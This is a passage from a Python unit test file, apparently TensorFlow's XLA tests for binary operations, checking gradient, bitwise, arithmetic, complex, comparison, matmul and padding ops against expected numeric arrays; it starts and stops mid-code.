np.array([-.6, -.4, -.2, 0, .2, .4], dtype=dtype),
expected=np.array([0.4, 1.2, 2.4, 4, 5, 6], dtype=dtype))
self._testBinary(
gen_nn_ops.selu_grad,
np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
np.array([-.6, -.4, -.2, .2, .4, .6], dtype=dtype),
expected=np.array(
[1.158099340847, 2.7161986816948, 4.67429802254,
4.202803949422, 5.2535049367774, 6.30420592413], dtype=dtype))
self._testBinary(
gen_nn_ops.relu_grad,
np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype=dtype),
np.array([0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9], dtype=dtype),
expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10], dtype=dtype))
self._testBinary(
gen_nn_ops.relu6_grad,
np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=dtype),
np.array(
[0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9, 6.1, 10.0], dtype=dtype),
expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10, 0, 0], dtype=dtype))
self._testBinary(
gen_nn_ops.softmax_cross_entropy_with_logits,
np.array([[1, 2, 3, 4], [5, 6, 7, 8]], dtype=dtype),
np.array([[0.1, 0.2, 0.3, 0.4], [0.4, 0.3, 0.2, 0.1]], dtype=dtype),
expected=[
np.array([1.44019, 2.44019], dtype=dtype),
np.array([[-0.067941, -0.112856, -0.063117, 0.243914],
[-0.367941, -0.212856, 0.036883, 0.543914]],
dtype=dtype),
],
equality_test=self.ListsAreClose)
# TODO(b/68813416): Fails with bfloat16.
if dtype != dtypes.bfloat16.as_numpy_dtype:
self._testBinary(
gen_nn_ops.sparse_softmax_cross_entropy_with_logits,
np.array(
[[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8],
[0.9, 1.0, 1.1, 1.2]],
dtype=dtype),
np.array([2, 1, 7], dtype=np.int32),
expected=[
np.array([1.342536, 1.442536, np.nan], dtype=dtype),
np.array(
[[0.213838, 0.236328, -0.738817, 0.288651], [
0.213838, -0.763672, 0.261183, 0.288651
], [np.nan, np.nan, np.nan, np.nan]],
dtype=dtype),
],
equality_test=self.ListsAreClose)
def testIntOps(self):
for dtype in self.signed_int_types:
self._testBinary(
gen_math_ops.truncate_div,
np.array([3, 3, -1, -9, -8], dtype=dtype),
np.array([2, -2, 7, 2, -4], dtype=dtype),
expected=np.array([1, -1, 0, -4, 2], dtype=dtype))
self._testSymmetricBinary(
bitwise_ops.bitwise_and,
np.array([0b1, 0b101, 0b1000], dtype=dtype),
np.array([0b0, 0b101, 0b1001], dtype=dtype),
expected=np.array([0b0, 0b101, 0b1000], dtype=dtype))
self._testSymmetricBinary(
bitwise_ops.bitwise_or,
np.array([0b1, 0b101, 0b1000], dtype=dtype),
np.array([0b0, 0b101, 0b1001], dtype=dtype),
expected=np.array([0b1, 0b101, 0b1001], dtype=dtype))
self._testSymmetricBinary(
bitwise_ops.bitwise_xor,
np.array([0b1, 0b111, 0b1100], dtype=dtype),
np.array([0b0, 0b101, 0b1001], dtype=dtype),
expected=np.array([0b1, 0b010, 0b0101], dtype=dtype))
lhs = np.array([0, 5, 3, 14], dtype=dtype)
rhs = np.array([5, 0, 7, 11], dtype=dtype)
self._testBinary(
bitwise_ops.left_shift, lhs, rhs,
expected=np.left_shift(lhs, rhs))
self._testBinary(
bitwise_ops.right_shift, lhs, rhs,
expected=np.right_shift(lhs, rhs))
if dtype in [np.int8, np.int16, np.int32, np.int64]:
lhs = np.array([-1, -5, -3, -14, -2], dtype=dtype)
rhs = np.array([5, 0, 1, 11, 36], dtype=dtype)
# HLO has saturating shift behavior.
bits = np.ceil(
np.log(np.iinfo(dtype).max - np.iinfo(dtype).min) / np.log(2))
expected = [
np.right_shift(l, r) if r < bits else np.sign(l)
for l, r in zip(lhs, rhs)
]
self._testBinary(bitwise_ops.right_shift, lhs, rhs, expected=expected)
def testNumericOps(self):
for dtype in self.numeric_types:
self._testBinary(
math_ops.add,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([11, 22], dtype=dtype))
self._testBinary(
math_ops.add,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([6, 7], dtype=dtype))
self._testBinary(
math_ops.add,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[8], [9]], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([1, 2, 100], dtype=dtype),
np.array([10, 20, -1], dtype=dtype),
expected=np.array([-9, -18, 101], dtype=dtype))
self._testBinary(
math_ops.subtract,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([4, 3], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[-6], [-5]], dtype=dtype))
# min/max not supported for complex
if dtype not in self.complex_types | {np.uint8, np.int8}:
self._testBinary(
math_ops.maximum,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([10, 20], dtype=dtype))
self._testBinary(
math_ops.maximum,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([5, 20], dtype=dtype))
self._testBinary(
math_ops.maximum,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[10], [7]], dtype=dtype))
self._testBinary(
math_ops.minimum,
np.array([1, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([1, 2], dtype=dtype))
self._testBinary(
math_ops.minimum,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([1, 5], dtype=dtype))
self._testBinary(
math_ops.minimum,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[7], [2]], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([1, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([10, 40], dtype=dtype))
self._testBinary(
math_ops.multiply,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([5, 100], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[70], [14]], dtype=dtype))
# Complex support for squared_difference is incidental, see b/68205550
if dtype not in self.complex_types | {np.uint8, np.int8}:
self._testBinary(
math_ops.squared_difference,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([81, 324], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([16, 9], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[36], [25]], dtype=dtype))
self._testBinary(
nn_ops.bias_add,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([2, -1], dtype=dtype),
expected=np.array([[3, 1], [5, 3]], dtype=dtype))
self._testBinary(
nn_ops.bias_add,
np.array([[[[1, 2], [3, 4]]]], dtype=dtype),
np.array([2, -1], dtype=dtype),
expected=np.array([[[[3, 1], [5, 3]]]], dtype=dtype))
if np.int64 in self.numeric_types:
self._testBinary(
math_ops.add,
np.array([0xffffffff, 0xfffffffff, 1, 1], dtype=np.int64),
np.array([1, 1, 0xffffffff, 0xfffffffff], dtype=np.int64),
expected=np.array([1 << 32, 1 << 36, 1 << 32, 1 << 36],
dtype=np.int64))
def testComplexOps(self):
for dtype in self.complex_types:
ctypes = {np.complex64: np.float32}
self._testBinary(
math_ops.complex,
np.array([[[[-1, 2], [2, 0]]]], dtype=ctypes[dtype]),
np.array([[[[2, -3], [0, 4]]]], dtype=ctypes[dtype]),
expected=np.array([[[[-1 + 2j, 2 - 3j], [2, 4j]]]], dtype=dtype))
self._testBinary(
lambda x, y: math_ops.approximate_equal(x, y, tolerance=0.0001),
np.array(
[[[[-1 + 2j, 2.00009999 - 3j], [2 - 3j, 3 + 4.01j]]]],
dtype=dtype),
np.array(
[[[[-1.001 + 2j, 2 - 3j], [2 - 3.00009j, 3 + 4j]]]], dtype=dtype),
expected=np.array([[[[False, True], [True, False]]]], dtype=dtype))
self._testBinary(
gen_math_ops.real_div,
np.array([3, 3j, -1.5j, -8, 2 + 3j, 2 + 4j], dtype=dtype),
np.array([2, -2, 7j, -4j, 4 - 6j, 1 + 2j], dtype=dtype),
expected=np.array(
[1.5, -1.5j, -0.2142857, -2j, (2 + 3j) / (4 - 6j), 2],
dtype=dtype))
# Test inf/nan scenarios.
self._testBinary(
gen_math_ops.real_div,
np.array([4 + 3j, 4, 3j, -4, -4j, 2 - 3j], dtype=dtype),
np.array([0, 0, 0, 0, 0, 0], dtype=dtype),
expected=np.array(
[
dtype(1 + 1j) / 0,
dtype(1) / 0,
dtype(1j) / 0,
dtype(-1) / 0,
dtype(-1j) / 0,
dtype(1 - 1j) / 0
],
dtype=dtype))
self._testBinary(
math_ops.pow,
dtype(3 + 2j),
dtype(4 - 5j),
expected=np.power(dtype(3 + 2j), dtype(4 - 5j)))
self._testBinary( # empty rhs
math_ops.pow,
np.array([1 + 2j, 2 - 3j], dtype=dtype),
np.zeros(shape=[0, 2], dtype=dtype),
expected=np.zeros(shape=[0, 2], dtype=dtype))
self._testBinary( # to zero power
math_ops.pow,
np.array([1 + 2j, 2 - 3j], dtype=dtype),
np.zeros(shape=[1, 2], dtype=dtype),
expected=np.ones(shape=[1, 2], dtype=dtype))
lhs = np.array([1 - 2j, 4 + 3j, 2 - 3j, 3, 2j, 1, 4], dtype=dtype)
rhs = np.array([2, 3j, 3 + 4j, 2 + 3j, 3 - 2j, 2, 3 + 3j], dtype=dtype)
scalar = dtype(2 + 2j)
self._testBinary(math_ops.pow, lhs, rhs, expected=np.power(lhs, rhs))
self._testBinary(
math_ops.pow, scalar, rhs, expected=np.power(scalar, rhs))
self._testBinary(math_ops.pow, lhs, scalar, np.power(lhs, scalar))
lhs = np.array([4 + 2j, -3 - 1j, 2j, 1], dtype=dtype)
rhs = np.array([5, -6j, 7 - 3j, -8j], dtype=dtype)
self._testBinary(
gen_math_ops.reciprocal_grad, lhs, rhs, expected=-rhs * lhs * lhs)
self._testBinary(
gen_math_ops.sigmoid_grad, lhs, rhs, expected=rhs * lhs * (1 - lhs))
self._testBinary(
gen_math_ops.rsqrt_grad, lhs, rhs, expected=lhs**3 * rhs / -2)
self._testBinary(
gen_math_ops.sqrt_grad, lhs, rhs, expected=rhs / (2 * lhs))
self._testBinary(
gen_math_ops.tanh_grad, lhs, rhs, expected=rhs * (1 - lhs * lhs))
def testComplexMath(self):
for dtype in self.complex_types:
self._testBinary(
math_ops.add,
np.array([1 + 3j, 2 + 7j], dtype=dtype),
np.array([10 - 4j, 20 + 17j], dtype=dtype),
expected=np.array([11 - 1j, 22 + 24j], dtype=dtype))
self._testBinary(
math_ops.add,
dtype(5 - 7j),
np.array([1 + 2j, 2 + 4j], dtype=dtype),
expected=np.array([6 - 5j, 7 - 3j], dtype=dtype))
self._testBinary(
math_ops.add,
np.array([[1 - 2j], [2 + 1j]], dtype=dtype),
dtype(7 + 5j),
expected=np.array([[8 + 3j], [9 + 6j]], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([1 + 3j, 2 + 7j], dtype=dtype),
np.array([10 - 4j, 20 + 17j], dtype=dtype),
expected=np.array([-9 + 7j, -18 - 10j], dtype=dtype))
self._testBinary(
math_ops.subtract,
dtype(5 - 7j),
np.array([1 + 2j, 2 + 4j], dtype=dtype),
expected=np.array([4 - 9j, 3 - 11j], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([[1 - 2j], [2 + 1j]], dtype=dtype),
dtype(7 + 5j),
expected=np.array([[-6 - 7j], [-5 - 4j]], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([1 + 3j, 2 + 7j], dtype=dtype),
np.array([10 - 4j, 20 + 17j], dtype=dtype),
expected=np.array(
[(1 + 3j) * (10 - 4j), (2 + 7j) * (20 + 17j)], dtype=dtype))
self._testBinary(
math_ops.multiply,
dtype(5 - 7j),
np.array([1 + 2j, 2 + 4j], dtype=dtype),
expected=np.array(
[(5 - 7j) * (1 + 2j), (5 - 7j) * (2 + 4j)], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([[1 - 2j], [2 + 1j]], dtype=dtype),
dtype(7 + 5j),
expected=np.array(
[[(7 + 5j) * (1 - 2j)], [(7 + 5j) * (2 + 1j)]], dtype=dtype))
self._testBinary(
math_ops.div,
np.array([8 - 1j, 2 + 16j], dtype=dtype),
np.array([2 + 4j, 4 - 8j], dtype=dtype),
expected=np.array(
[(8 - 1j) / (2 + 4j), (2 + 16j) / (4 - 8j)], dtype=dtype))
self._testBinary(
math_ops.div,
dtype(1 + 2j),
np.array([2 + 4j, 4 - 8j], dtype=dtype),
expected=np.array(
[(1 + 2j) / (2 + 4j), (1 + 2j) / (4 - 8j)], dtype=dtype))
self._testBinary(
math_ops.div,
np.array([2 + 4j, 4 - 8j], dtype=dtype),
dtype(1 + 2j),
expected=np.array(
[(2 + 4j) / (1 + 2j), (4 - 8j) / (1 + 2j)], dtype=dtype))
# TODO(b/68205550): math_ops.squared_difference shouldn't be supported.
self._testBinary(
nn_ops.bias_add,
np.array([[1 + 2j, 2 + 7j], [3 - 5j, 4 + 2j]], dtype=dtype),
np.array([2 + 6j, -1 - 3j], dtype=dtype),
expected=np.array([[3 + 8j, 1 + 4j], [5 + 1j, 3 - 1j]], dtype=dtype))
self._testBinary(
nn_ops.bias_add,
np.array([[[[1 + 4j, 2 - 1j], [3 + 7j, 4]]]], dtype=dtype),
np.array([2 + 1j, -1 + 2j], dtype=dtype),
expected=np.array(
[[[[3 + 5j, 1 + 1j], [5 + 8j, 3 + 2j]]]], dtype=dtype))
def _testDivision(self, dtype):
"""Test cases for division operators."""
self._testBinary(
math_ops.div,
np.array([10, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([1, 10], dtype=dtype))
self._testBinary(
math_ops.div,
dtype(40),
np.array([2, 20], dtype=dtype),
expected=np.array([20, 2], dtype=dtype))
self._testBinary(
math_ops.div,
np.array([[10], [4]], dtype=dtype),
dtype(2),
expected=np.array([[5], [2]], dtype=dtype))
if dtype not in self.complex_types: # floordiv unsupported for complex.
self._testBinary(
gen_math_ops.floor_div,
np.array([3, 3, -1, -9, -8], dtype=dtype),
np.array([2, -2, 7, 2, -4], dtype=dtype),
expected=np.array([1, -2, -1, -5, 2], dtype=dtype))
def testIntDivision(self):
for dtype in self.signed_int_types:
self._testDivision(dtype)
def testFloatDivision(self):
for dtype in self.float_types | self.complex_types:
self._testDivision(dtype)
def _testRemainder(self, dtype):
"""Test cases for remainder operators."""
self._testBinary(
gen_math_ops.floor_mod,
np.array([3, 3, -1, -8], dtype=dtype),
np.array([2, -2, 7, -4], dtype=dtype),
expected=np.array([1, -1, 6, 0], dtype=dtype))
self._testBinary(
gen_math_ops.truncate_mod,
np.array([3, 3, -1, -8], dtype=dtype),
np.array([2, -2, 7, -4], dtype=dtype),
expected=np.array([1, 1, -1, 0], dtype=dtype))
def testIntRemainder(self):
for dtype in self.signed_int_types - {np.int8}:
self._testRemainder(dtype)
def testFloatRemainder(self):
for dtype in self.float_types:
self._testRemainder(dtype)
def testLogicalOps(self):
self._testBinary(
math_ops.logical_and,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[False, False], [False, True]], dtype=np.bool))
self._testBinary(
math_ops.logical_or,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[True, True], [False, True]], dtype=np.bool))
def testComparisons(self):
self._testBinary(
math_ops.equal,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, True, False], dtype=np.bool))
self._testBinary(
math_ops.equal,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, True, False], dtype=np.bool))
self._testBinary(
math_ops.equal,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [True], [False]], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, False, True], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, False, True], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [False], [True]], dtype=np.bool))
for greater_op in [math_ops.greater, (lambda x, y: x > y)]:
self._testBinary(
greater_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, False, True], dtype=np.bool))
self._testBinary(
greater_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, False, False], dtype=np.bool))
self._testBinary(
greater_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [False], [False]], dtype=np.bool))
for greater_equal_op in [math_ops.greater_equal, (lambda x, y: x >= y)]:
self._testBinary(
greater_equal_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, True, True], dtype=np.bool))
self._testBinary(
greater_equal_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, True, False], dtype=np.bool))
self._testBinary(
greater_equal_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [True], [False]], dtype=np.bool))
for less_op in [math_ops.less, (lambda x, y: x < y)]:
self._testBinary(
less_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, False, False], dtype=np.bool))
self._testBinary(
less_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, False, True], dtype=np.bool))
self._testBinary(
less_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [False], [True]], dtype=np.bool))
if np.int64 in self.numeric_types:
self._testBinary(
less_op,
np.array([[10], [7], [2], [-1]], dtype=np.int64),
np.int64(7),
expected=np.array(
[[False], [False], [True], [True]], dtype=np.bool))
for less_equal_op in [math_ops.less_equal, (lambda x, y: x <= y)]:
self._testBinary(
less_equal_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, True, False], dtype=np.bool))
self._testBinary(
less_equal_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, True, True], dtype=np.bool))
self._testBinary(
less_equal_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [True], [True]], dtype=np.bool))
def testS64Comparisons(self):
for op in [(lambda x, y: x < y), (lambda x, y: x <= y),
(lambda x, y: x >= y), (lambda x, y: x > y)]:
lhs = np.array(
[
np.int64(0x000000007FFFFFFF),
np.int64(0x000000007FFFFFFF),
np.int64(0x0000000080000000),
np.int64(0x0000000080000000),
np.int64(0x0000000080000001),
np.int64(0x00000000FFFF0000),
np.int64(0x00000000FFFF0000),
np.int64(0x00000000FFFFFFFE),
np.int64(0x00000000FFFFFFFF),
np.int64(0x00000000FFFFFFFF),
np.int64(0x0000000100000000),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(0x0000000200000002),
np.int64(-0x7FFFFFFF00000002),
np.int64(-0x7FFFFFFF00000002),
np.int64(-0x7FFFFFFF00000001),
np.int64(-0x7FFFFFFF00000001),
np.int64(-0x7FFFFFFF00000001),
np.int64(-0x7FFFFFFF00000001),
np.int64(0x7ffffffefff00010),
np.int64(0x7ffffffefff00010),
np.int64(-1),
np.int64(-1)
],
dtype=np.int64)
rhs = np.array(
[
np.int64(0x000000007FFFFFFE),
np.int64(0x000000007FFFFFFF),
np.int64(0x000000007FFFFFFF),
np.int64(0x0000000080000000),
np.int64(0x0000000080000001),
np.int64(0x00000000FFFF0000),
np.int64(0x00000000FFFF0001),
np.int64(0x00000000FFFFFFFF),
np.int64(0x00000000FFFFFFFE),
np.int64(0x00000000FFFFFFFF),
np.int64(0x00000000FFFFFFFF),
np.int64(0x0000000100000001),
np.int64(0x0000000100000002),
np.int64(0x0000000100000003),
np.int64(0x0000000200000001),
np.int64(0x0000000200000002),
np.int64(0x0000000200000003),
np.int64(0x0000000300000001),
np.int64(0x0000000300000002),
np.int64(0x0000000300000003),
np.int64(0x00000000FFFFFFFF),
np.int64(-0x7FFFFFFF00000001),
np.int64(0x00000000FFFFFFFE),
np.int64(0x00000000FFFFFFFF),
np.int64(-0x7FFFFFFF00000002),
np.int64(-0x7FFFFFFF00000001),
np.int64(0x00000000FFFFFFFF),
np.int64(-0x7FFFFFFF00000001),
np.int64(-2),
np.int64(-1)
],
dtype=np.int64)
expected = np.array([op(l, r) for l, r in zip(lhs, rhs)], dtype=np.bool)
self._testBinary(op, lhs, rhs, expected=expected)
def testBroadcasting(self):
"""Tests broadcasting behavior of an operator."""
for dtype in self.numeric_types:
self._testBinary(
math_ops.add,
np.array(3, dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([13, 23], dtype=dtype))
self._testBinary(
math_ops.add,
np.array([10, 20], dtype=dtype),
np.array(4, dtype=dtype),
expected=np.array([14, 24], dtype=dtype))
# [1,3] x [4,1] => [4,3]
self._testBinary(
math_ops.add,
np.array([[10, 20, 30]], dtype=dtype),
np.array([[1], [2], [3], [4]], dtype=dtype),
expected=np.array(
[[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
dtype=dtype))
# [3] * [4,1] => [4,3]
self._testBinary(
math_ops.add,
np.array([10, 20, 30], dtype=dtype),
np.array([[1], [2], [3], [4]], dtype=dtype),
expected=np.array(
[[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
dtype=dtype))
def testFill(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.fill,
np.array([], dtype=np.int32),
dtype(-42),
expected=dtype(-42))
self._testBinary(
array_ops.fill,
np.array([1, 2], dtype=np.int32),
dtype(7),
expected=np.array([[7, 7]], dtype=dtype))
self._testBinary(
array_ops.fill,
np.array([3, 2], dtype=np.int32),
dtype(50),
expected=np.array([[50, 50], [50, 50], [50, 50]], dtype=dtype))
# Helper method used by testMatMul, testSparseMatMul, testBatchMatMul below.
def _testMatMul(self, op):
for dtype in self.float_types:
self._testBinary(
op,
np.array([[-0.25]], dtype=dtype),
np.array([[8]], dtype=dtype),
expected=np.array([[-2]], dtype=dtype))
self._testBinary(
op,
np.array([[100, 10, 0.5]], dtype=dtype),
np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
expected=np.array([[123, 354]], dtype=dtype))
self._testBinary(
op,
np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
np.array([[100], [10]], dtype=dtype),
expected=np.array([[130], [250], [680]], dtype=dtype))
self._testBinary(
op,
np.array([[1000, 100], [10, 1]], dtype=dtype),
np.array([[1, 2], [3, 4]], dtype=dtype),
expected=np.array([[1300, 2400], [13, 24]], dtype=dtype))
self._testBinary(
op,
np.array([], dtype=dtype).reshape((2, 0)),
np.array([], dtype=dtype).reshape((0, 3)),
expected=np.array([[0, 0, 0], [0, 0, 0]], dtype=dtype))
def testMatMul(self):
self._testMatMul(math_ops.matmul)
# TODO(phawkins): failing on GPU, no registered kernel.
def DISABLED_testSparseMatMul(self):
# Binary wrappers for sparse_matmul with different hints
def SparseMatmulWrapperTF(a, b):
return math_ops.sparse_matmul(a, b, a_is_sparse=True)
def SparseMatmulWrapperFT(a, b):
return math_ops.sparse_matmul(a, b, b_is_sparse=True)
def SparseMatmulWrapperTT(a, b):
return math_ops.sparse_matmul(a, b, a_is_sparse=True, b_is_sparse=True)
self._testMatMul(math_ops.sparse_matmul)
self._testMatMul(SparseMatmulWrapperTF)
self._testMatMul(SparseMatmulWrapperFT)
self._testMatMul(SparseMatmulWrapperTT)
def testBatchMatMul(self):
# Same tests as for tf.matmul above.
self._testMatMul(math_ops.matmul)
# Tests with batches of matrices.
self._testBinary(
math_ops.matmul,
np.array([[[-0.25]]], dtype=np.float32),
np.array([[[8]]], dtype=np.float32),
expected=np.array([[[-2]]], dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([[[-0.25]], [[4]]], dtype=np.float32),
np.array([[[8]], [[2]]], dtype=np.float32),
expected=np.array([[[-2]], [[8]]], dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array(
[[[[7, 13], [10, 1]], [[2, 0.25], [20, 2]]],
[[[3, 5], [30, 3]], [[0.75, 1], [40, 4]]]],
dtype=np.float32),
np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], [[[11, 22], [33, 44]],
[[55, 66], [77, 88]]]],
dtype=np.float32),
expected=np.array(
[[[[46, 66], [13, 24]], [[11.75, 14], [114, 136]]],
[[[198, 286], [429, 792]], [[118.25, 137.5], [2508, 2992]]]],
dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([], dtype=np.float32).reshape((2, 2, 0)),
np.array([], dtype=np.float32).reshape((2, 0, 3)),
expected=np.array(
[[[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]]],
dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([], dtype=np.float32).reshape((0, 2, 4)),
np.array([], dtype=np.float32).reshape((0, 4, 3)),
expected=np.array([], dtype=np.float32).reshape(0, 2, 3))
# Regression test for b/31472796.
if hasattr(np, "matmul"):
x = np.arange(0, 3 * 5 * 2 * 7, dtype=np.float32).reshape((3, 5, 2, 7))
self._testBinary(
lambda x, y: math_ops.matmul(x, y, adjoint_b=True),
x, x,
expected=np.matmul(x, x.transpose([0, 1, 3, 2])))
def testExpandDims(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.expand_dims,
dtype(7),
np.int32(0),
expected=np.array([7], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([42], dtype=dtype),
np.int32(0),
expected=np.array([[42]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([], dtype=dtype),
np.int32(0),
expected=np.array([[]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(0),
expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(1),
expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(2),
expected=np.array([[[[1, 2]], [[3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(3),
expected=np.array([[[[1], [2]], [[3], [4]]]], dtype=dtype))
def testPad(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.pad,
np.array(
[[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array(
[[1, 2], [2, 1]], dtype=np.int32),
expected=np.array(
[[0, 0, 0, 0, 0, 0],
[0, 0, 1, 2, 3, 0],
[0, 0, 4, 5, 6, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
dtype=dtype))
self._testBinary(
lambda x, y: array_ops.pad(x, y, constant_values=7),
np.array(
[[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array(
[[0, 3], [2, 1]], dtype=np.int32),
expected=np.array(
[[7, 7, 1, 2, 3, 7],
[7, 7, 4, 5, 6, 7],
[7, 7, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7]],
dtype=dtype))
def testSymmetricMirrorPad(self):
mirror_pad = lambda t, paddings: array_ops.pad(t, paddings, "SYMMETRIC")
for dtype in self.numeric_types:
self._testBinary(
mirror_pad,
np.array(
[
[1, 2, 3], #
[4, 5, 6], #
],
dtype=dtype),
np.array([[
2,
2,
], [3, 3]], dtype=np.int32),
expected=np.array(
[
[6, 5, 4, 4, 5, 6, 6, 5, 4], #
[3, 2, 1, 1, 2, 3, 3, 2, 1], #
[3, 2, 1, 1, 2, 3, 3, 2, 1], #
[6, 5, 4, 4, 5, 6, 6, 5, 4], #
[6, 5, 4, 4, 5, 6, 6, 5, 4], #
[3, 2, 1, 1, 2, 3, 3, 2, 1], #
],
dtype=dtype))
self._testBinary(
mirror_pad,
np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array([[0, 0], [0, 0]], dtype=np.int32),
expected=np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype))
def testReflectMirrorPad(self):
mirror_pad = lambda t, paddings: array_ops.pad(t, paddings, "REFLECT")
for dtype in self.numeric_types:
self._testBinary(
mirror_pad,
np.array(
[
[1, 2, 3], #
[4, 5, 6], #
],
dtype=dtype),
np.array([[
1,
1,
], [2, 2]], dtype=np.int32),
expected=np.array(
[
[6, 5, 4, 5, 6, 5, 4], #
[3, 2, 1, 2, 3, 2, 1], #
[6, 5, 4, 5, 6, 5, 4], #
[3, 2, 1, 2, 3, 2, 1]
],
dtype=dtype))
self._testBinary(
mirror_pad,
np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array([[0, 0], [0, 0]], dtype=np.int32),
expected=np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype))
self._testBinary(
mirror_pad,
np.array(
[
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9]
